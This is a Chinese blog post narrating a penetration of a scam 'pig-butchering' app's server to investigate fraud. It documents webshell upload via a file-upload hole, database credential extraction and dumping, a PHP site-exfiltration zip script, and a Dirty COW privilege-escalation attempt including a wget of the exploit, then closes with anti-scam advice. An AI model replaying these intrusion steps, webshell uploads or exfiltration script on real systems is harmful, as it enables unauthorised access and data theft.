记一次APP的渗透之旅

Delina

原文链接：记一次APP的渗透之旅
​
所谓“杀猪盘”，是指诈骗分子利用网络交友通常是异性交友，诱导受害人下载诈骗APP并在上面进行各种“投资”，如博彩、股票、期货甚至虚拟货币的网络诈骗。今年某月某日小白就遭遇了这种骗局，他先是被骗子通过QQ添加并下载了一个名为”心动“的APP，在“心动“APP上结识了位名为“xx老师”的美女，小白被美色迷了眼打算相约这名网友，但是美女则借口让他下载另一个名为午夜乐园的APP进行投资，果不其然小白被成功骗取10余万。
0x01 APP测试准备根据小白的描述，我们关注到以下几点信息，分别是 QQ、“心动”APP以及“午夜乐园”APP，但是小白因不堪被骗将骗子QQ删除了。所以我们无法从QQ号这点进行入手，但是这两个APP的APK包倒是存在，于是开始渗透分析。
安装APP使用夜神模拟器安装这两个APP，为了方便起见就使用安卓5.0版本，否则无法抓取到 https 数据包

小知识：从 Android 7.0 开始，默认的网络安全性配置修改，默认不再信任用户添加的 CA 证书，也就不再信任抓包工具的证书

​因为“午夜乐园”APP需要邀请码才能注册，所以我们先安装“心动”APP​
设置抓包在 BurpSuite 中设置监听地址以及监听端口，其中地址为内网的IP地址

​

设置网络中的 HTTP 代理为 BurpSuite 中的代理地址和端口

​

访问百度，在 Burp Suite 中成功抓取到数据包​现在针对 http 协议的数据包都可以抓取到了
安装证书接下来为了抓取到 https 的数据包，我们需要为其安装 CA 证书​访问https://burp点击CA开始下载证书，下载完成后在设置中找到安全​选择从SD卡安装​选择之前下载的证书并为证书命名

​

在用户凭据中已存在证书

​

访问https://www.baidu.com

​

在 Burp Suite 中成功抓取到 https 数据包​
0x02 上线shell初探上传漏洞在APP中注册一个测试账号

​

发现在发布动态处存在文件上传
​​

​

使用 Burp Suite 截取数据包，测试后发现目标站点只返回0或1

​

上传后在朋友圈界面发现该功能正常，那么对应的图片路径在哪呢？

​

通过抓包发现该图片的具体地址​修改数据包将其文件名后缀修改为php时则无法上传，可能存在防护机制

​

文件上传漏洞获取webshell尝试了几种绕过方式无果后，在朋友圈背景图片发现文件上传点，将冰蝎上传

​

幸运的是目标直接返回了木马地址，使用冰蝎连接目标

​

至此 webshell 成功上线，但可惜的是这是 docker 环境。同时为了维持对目标站点的控制，继续上传了一个哥斯拉马
​
0x03 信息收集查看当前环境查看当前用户为普通的 www 用户，能够执行一些简单的命令

​

查看文件管理，发现网站下存在 thinkphp 框架，开始寻找配置文件

​

数据库登录在配置文件中发现数据库连接文件

1. return [
   
2.     // 数据库类型
   
3.     'type'            => Env::get('database.type', 'mysql'),
   
4.     // 服务器地址
   
5.     'hostname'        => Env::get('database.hostname', '192.168.0.59'),
   
6.     // 数据库名
   
7.     'database'        => Env::get('database.database', 'netchat'),
   
8.     // 用户名
   
9.     'username'        => Env::get('database.username', 'root'),
   
10.     // 密码
    
11.     'password'        => Env::get('database.password', 'MysqlNetchatPWD#'),
    
12.     // 端口
    
13.     'hostport'        => Env::get('database.hostport', '3305'),
    
14. ];

复制代码

由于无法通过冰蝎无法连接数据库，我们上传 adminer 连接数据库，将服务器地址设置为192.168.0.59:3305，输入账号和密码

​

在 adminer 中选择数据库导出，将当前数据库直接打包下载

​

后台地址与账号密码​​
在数据库中还有些意外收获，里面包含了一些管理员的账号密码

​

经过解密后发现 admin666 密码为123456

​

查看 admin_log 表后发现登录地址为https://xx.xx.xx.xx/adim888/index/login
​
访问后为如下界面，我们只需要输入账号密码与谷歌验证码即可登录，为了不打草惊蛇未直接登录后台。

​

打包网站接下来为了方便分析，使用如下脚本打包整个网站进行下载

1. <?php
   
2. 
   
3. error_reporting(0);
   
4. 
   
5. class PHPZip{
   
6.     var $dirInfo = array("0","0");
   
7.     var $datasec = array();
   
8.     var $ctrl_dir = array();
   
9.     var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
   
10.     var $old_offset   = 0;
    
11. 
    
12.     function createZip($dir, $zipfilename){
    
13.         if (@function_exists('gzcompress')){
    
14.             @set_time_limit("0");
    
15.             if (is_array($dir)){
    
16.                 $fd = fopen ($dir, "r");
    
17.                 $fileValue = fread ($fd, filesize ($filename));
    
18.                 fclose ($fd);
    
19.                 if (is_array($dir)) $filename = basename($dir);
    
20.                 $this -> addFile($fileValue, "$filename");
    
21.             }else{
    
22.                 $this->dirTree($dir,$dir);
    
23.             }
    
24. 
    
25.             $out = $this -> filezip();
    
26.             $fp = fopen($zipfilename, "w");
    
27.             fwrite($fp, $out, strlen($out));
    
28.             fclose($fp);
    
29.             $filesize = filesize($zipfilename);
    
30. 
    
31.             if ($filesize < 104857600) {
    
32.                 echo "create zip success!";
    
33.             } else {
    
34.                 echo "create zip error!";
    
35.             }        }
    
36.      }
    
37. 
    
38.     //get dir tree..
    
39.     function dirTree($directory,$rootDir){
    
40.         $fileDir = $rootDir;
    
41.         $myDir = dir($directory);
    
42.         while($file=$myDir->read()){
    
43.             if(is_dir("$directory/$file") and $file!="." and $file!=".."){
    
44.                 $this->dirInfo[0]++;
    
45.                 $rootDir ="$fileDir$file/";
    
46.                 $this -> addFile('', "$rootDir");
    
47. 
    
48.                 //go on n's folders
    
49.                 $this->dirTree("$directory/$file",$rootDir);
    
50.             }else{
    
51.                 if($file!="." and $file!=".."){
    
52.                     $this->dirInfo[1]++;
    
53.                     $fileValue = file_get_contents("$directory/$file");
    
54.                     $this -> addFile($fileValue, "$fileDir$file");
    
55.                 }
    
56.             }
    
57.         }
    
58.         $myDir->close();
    
59.     }
    
60. 
    
61.     function unix2DosTime($unixtime = 0) {
    
62.         $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
    
63. 
    
64.         if ($timearray['year'] < 1980) {
    
65.              $timearray['year'] = 1980;
    
66.              $timearray['mon'] = 1;
    
67.              $timearray['mday'] = 1;
    
68.              $timearray['hours'] = 0;
    
69.              $timearray['minutes'] = 0;
    
70.              $timearray['seconds'] = 0;
    
71.         } // end if
    
72. 
    
73.         return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
    
74.                 ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
    
75.     }
    
76. 
    
77.     function addFile($data, $name, $time = 0){
    
78.         $name = str_replace('\\', '/', $name);
    
79. 
    
80.         $dtime = dechex($this->unix2DosTime($time));
    
81.         $hexdtime = '\x' . $dtime[6] . $dtime[7]
    
82.                   . '\x' . $dtime[4] . $dtime[5]
    
83.                   . '\x' . $dtime[2] . $dtime[3]
    
84.                   . '\x' . $dtime[0] . $dtime[1];
    
85.         eval('$hexdtime = "' . $hexdtime . '";');
    
86. 
    
87.         $fr = "\x50\x4b\x03\x04";
    
88.         $fr .= "\x14\x00";            // ver needed to extract
    
89.         $fr .= "\x00\x00";            // gen purpose bit flag
    
90.         $fr .= "\x08\x00";            // compression method
    
91.         $fr .= $hexdtime;             // last mod time and date
    
92. 
    
93.         // "local file header" segment
    
94.         $unc_len = strlen($data);
    
95.         $crc = crc32($data);
    
96.         $zdata = gzcompress($data);
    
97.         $c_len = strlen($zdata);
    
98.         $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); // fix crc bug
    
99.         $fr .= pack('V', $crc);             // crc32
    
100.         $fr .= pack('V', $c_len);           // compressed filesize
     
101.         $fr .= pack('V', $unc_len);         // uncompressed filesize
     
102.         $fr .= pack('v', strlen($name));    // length of filename
     
103.         $fr .= pack('v', 0);                // extra field length
     
104.         $fr .= $name;
     
105. 
     
106.         // "file data" segment
     
107.         $fr .= $zdata;
     
108. 
     
109.         // "data descriptor" segment (optional but necessary if archive is not
     
110.         // served as file)
     
111.         $fr .= pack('V', $crc);                 // crc32
     
112.         $fr .= pack('V', $c_len);               // compressed filesize
     
113.         $fr .= pack('V', $unc_len);             // uncompressed filesize
     
114. 
     
115.         // add this entry to array
     
116.         $this -> datasec[] = $fr;
     
117.         $new_offset        = strlen(implode('', $this->datasec));
     
118. 
     
119.         // now add to central directory record
     
120.         $cdrec = "\x50\x4b\x01\x02";
     
121.         $cdrec .= "\x00\x00";                // version made by
     
122.         $cdrec .= "\x14\x00";                // version needed to extract
     
123.         $cdrec .= "\x00\x00";                // gen purpose bit flag
     
124.         $cdrec .= "\x08\x00";                // compression method
     
125.         $cdrec .= $hexdtime;                 // last mod time & date
     
126.         $cdrec .= pack('V', $crc);           // crc32
     
127.         $cdrec .= pack('V', $c_len);         // compressed filesize
     
128.         $cdrec .= pack('V', $unc_len);       // uncompressed filesize
     
129.         $cdrec .= pack('v', strlen($name) ); // length of filename
     
130.         $cdrec .= pack('v', 0 );             // extra field length
     
131.         $cdrec .= pack('v', 0 );             // file comment length
     
132.         $cdrec .= pack('v', 0 );             // disk number start
     
133.         $cdrec .= pack('v', 0 );             // internal file attributes
     
134.         $cdrec .= pack('V', 32 );            // external file attributes - 'archive' bit set
     
135. 
     
136.         $cdrec .= pack('V', $this -> old_offset ); // relative offset of local header
     
137.         $this -> old_offset = $new_offset;
     
138. 
     
139.         $cdrec .= $name;
     
140. 
     
141.         // optional extra field, file comment goes here
     
142.         // save to central directory
     
143.         $this -> ctrl_dir[] = $cdrec;
     
144.     }
     
145. 
     
146.     function filezip(){
     
147.         $data = implode('', $this -> datasec);
     
148.         $ctrldir = implode('', $this -> ctrl_dir);
     
149. 
     
150.         return
     
151.             $data .
     
152.             $ctrldir .
     
153.             $this -> eof_ctrl_dir .
     
154.             pack('v', sizeof($this -> ctrl_dir)) .  // total # of entries "on this disk"
     
155.             pack('v', sizeof($this -> ctrl_dir)) .  // total # of entries overall
     
156.             pack('V', strlen($ctrldir)) .           // size of central dir
     
157.             pack('V', strlen($data)) .              // offset to start of central dir
     
158.             "\x00\x00";                             // .zip file comment length
     
159.     }
     
160. }
     
161. 
     
162. $zip = new PHPZip();
     
163. $path = $_GET['path'];
     
164. $filename = $_GET['filename'];
     
165. if (isset($path)&&isset($filename)) {
     
166.     $zip -> createZip($path, $filename);
     
167. } else {
     
168.     echo "please input correct path and filename, like <a href=#>http://example.com?path=/home&filename=home.zip</a>";
     
169. }
     
170. 
     
171. ?>

复制代码

IP地址查询通过简单的sql语句对 admin 登录日志进行查询
select distinct ip from yl_admin_log limit 50

​

发现该站点的登录IP都是国外的IP，猜测网站管理员都是通过代理或本身就在国外访问的后台

​

而查询 yl_core_ip 表中发现了一个IP

​

查询微步后，该IP已经被打上了恶意地址标签

​

​​
0x04 权限提升由于当前权限比较低，我们也需要拿到 docker 环境下的 root 权限，但是我没有提权成功，自然也无法利用 docker 逃逸来跳到其真实环境下。这里演示下我使用脏牛提权的失败记录吧。
系统信息收集

1. uname -a
   
2. cat /etc/issue

复制代码

​

当前系统为 Debian GNU/Linux 10
漏洞查询上传linuxenum和linux-exploit-suggestor，赋予执行权限并执行

1. chmod 777 linuxenum.sh
   
2. chmod 777 linux-exploit-suggestor.sh

复制代码

​

​

脏牛提权通过 linux-exploit-suggestor 返回的结果，其中存在脏牛漏洞

1. wget https://www.exploit-db.com/download/40616 ##这里我直接上传了
   
2. mv 40616 cowroot.c
   
3. ## 正式从这开始
   
4. gcc cowroot.c -o cowroot -pthread
   
5. chmod +x cowroot
   
6. ./cowroot

复制代码

失败过程就不截图了
0x05 受骗分析及警示登录客服查看聊天记录在数据库中还有相关客服用户的账号密码，直接解码后面的 base64 编码就可以获取到明文

​

登录几个客服用户进行查看

​

杀猪盘流程这里我们也根据小白的注册时间找到了它的账号，为q123456x

​

通过注册IP确认该用户为受害人账号。但是尝试登录后发现该用户已经被锁定，在数据库中发现该用户的islogin为0，修改为1后还是无法登录，通过查看管理员的操作记录，发现其一直在封锁账号。

​

再根据几个客服的聊天记录，我们总结了”杀猪盘“流程

1. 1、招揽有“交友”目的的年轻人
   
2. 2、通过客服为其提供“服务”
   
3. 3、安排”漂亮姐姐“骗取年轻人投资
   
4. 4、年轻人欲望上头开始投资
   
5. 5、最终被骗人财两空

复制代码

警示

1. <div aria-label="代码段 小部件" class="cke_widget_wrapper cke_widget_block cke_widget_codeSnippet cke_widget_selected" data-cke-display-name="代码段" data-cke-filter="off" data-cke-widget-id="162" data-cke-widget-wrapper="1" role="region" tabindex="-1" contenteditable="false"><pre class="cke_widget_element" data-cke-widget-data="%7B%22code%22%3A%221%E3%80%81%E8%AD%A6%E6%83%95%E5%9C%A8%E6%9C%8B%E5%8F%8B%E5%9C%88%E5%92%8C%E7%A7%81%E8%81%8A%E4%B8%AD%E5%91%88%E7%8E%B0%E7%9A%84%E5%AE%8C%E7%BE%8E%E5%AF%B9%E8%B1%A1%EF%BC%8C%E5%AE%8C%E7%BE%8E%E4%BA%BA%E8%AE%BE%E5%BE%80%E5%BE%80%E5%B0%B1%E6%98%AF%E8%AF%B1%E9%A5%B5%5Cn2%E3%80%81%E5%88%87%E5%8B%BF%E5%92%8C%E9%99%8C%E7%94%9F%E4%BA%BA%E8%B0%88%E9%92%B1%E3%80%81%E4%B8%80%E8%B5%B7%E6%8A%95%E8%B5%84%EF%BC%8C%E8%AE%B0%E4%BD%8F%EF%BC%8C%E7%BD%91%E4%B8%8A%E2%80%9C%E5%AF%B9%E8%B1%A1%E2%80%9D%E4%B9%9F%E6%98%AF%E9%99%8C%E7%94%9F%E4%BA%BA%5Cn3%E3%80%81%E5%88%87%E5%8B%BF%E4%B8%8B%E8%BD%BD%E5%AE%89%E8%A3%85%E7%BD%91%E4%B8%8A%E5%90%84%E7%B1%BB%E6%8A%95%E8%B5%84%E5%8D%9A%E5%BD%A9%C2%A0APP%E9%93%BE%E6%8E%A5%EF%BC%8C%E4%B8%8D%E8%A6%81%E5%9C%A8%E6%9C%AA%E9%AA%8C%E8%AF%81%E7%BD%91%E7%AB%99%E6%8A%95%E8%B5%84%5Cn4%E3%80%81%E4%B8%8D%E5%90%91%E6%9C%AA%E9%AA%8C%E8%AF%81%E7%9A%84%E9%99%8C%E7%94%9F%E8%B4%A6%E6%88%B7%E8%BD%AC%E8%B4%A6%E6%B1%87%E6%AC%BE%5Cn5%E3%80%81%E4%B8%8D%E8%A6%81%E5%8F%82%E4%B8%8E%E7%BD%91%E4%B8%8A%E5%8D%9A%E5%BD%A9%EF%BC%8C%E6%B6%89%E5%AB%8C%E8%BF%9D%E6%B3%95%E3%80%82%5Cn6%E3%80%81%E4%B8%8D%E8%A6%81%E8%A2%AB%E6%AC%B2%E6%9C%9B%E5%86%B2%E6%98%8F%E4%BA%86%E5%A4%B4%22%2C%22classes%22%3Anull%7D" data-cke-widget-keep-attr="0" data-cke-widget-upcasted="1" data-widget="codeSnippet"><code class="hljs">1、警惕在朋友圈和私聊中呈现的完美对象，完美人设往往就是诱饵
   
2. 2、切勿和陌生人谈钱、一起投资，记住，网上“对象”也是陌生人
   
3. 3、切勿下载安装网上各类投资博彩 APP链接，不要在未验证网站投资
   
4. 4、不向未验证的陌生账户转账汇款
   
5. 5、不要参与网上博彩，涉嫌违法。
   
6. 6、不要被欲望冲昏了头</code></pre>
   
7. <span class="cke_reset cke_widget_drag_handler_container" style="background:rgba(220,220,220,0.5);background-image:url(https://csdnimg.cn/release/blog_editor_html/release1.9.7/ckeditor/plugins/widget/images/handle.png);display:none;"><img class="cke_reset cke_widget_drag_handler" data-cke-widget-drag-handler="1" role="presentation" src="data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==" title="点击并拖拽以移动" width="15" height="15"></span></div>
   
8. 
   
9. 
   
10. <span data-cke-copybin-end="1">​</span>

复制代码